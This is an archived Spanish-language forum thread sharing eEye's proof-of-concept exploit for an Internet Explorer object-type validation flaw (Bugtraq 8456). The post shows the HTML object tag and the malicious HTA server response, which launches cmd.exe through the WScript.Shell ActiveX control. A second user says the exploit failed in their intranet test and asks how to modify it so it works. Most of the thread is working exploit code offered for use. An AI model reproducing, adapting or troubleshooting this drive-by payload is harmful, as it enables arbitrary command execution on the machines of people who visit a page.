PDA

Ver la versión completa : Microsoft Internet Explorer Object Type Validation Vulnerability



<PICCOLO>
31-08-2003, 13:47
Aqui teneis el exploit:

------------------------------------------------------
The following proof of concept example has been made available by eEye:

--------------Client HTTP request---------------------------
<html>
...
<object data="www.yourinternethost.com/yourexploitwebpageorcgi.html">
</object>
</html>
------------------------------------------------------------

-------------Server HTTP Response---------------------------
HTTP/1.1 200 OK
Date: Tue, 13 May 2003 18:06:43 GMT
Server: Apache
Content-Type: application/hta
Content-Length: 191

<html>
<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.Run("cmD.exe /k echO so loNg, and ThaNks For all yoUr EmplOyeeS");
</script>
</html>
------------------------------------------------------------

Mas info en: http://www.securityfocus.com/bid/8456/discussion/

MarcoAlfredo
01-09-2003, 23:48
realize las pruebas dentro de una intranet y no salio los resultados como en la pagina de ejemplos, a que se debe o como puedo modificar para que me salga correctamente? incluso cuando hago la prueba en mi maquina sale el error de activex y no me deja ejecutarlo y sin embargo de las paginas donde estan los ejemplos si se puede ejecutar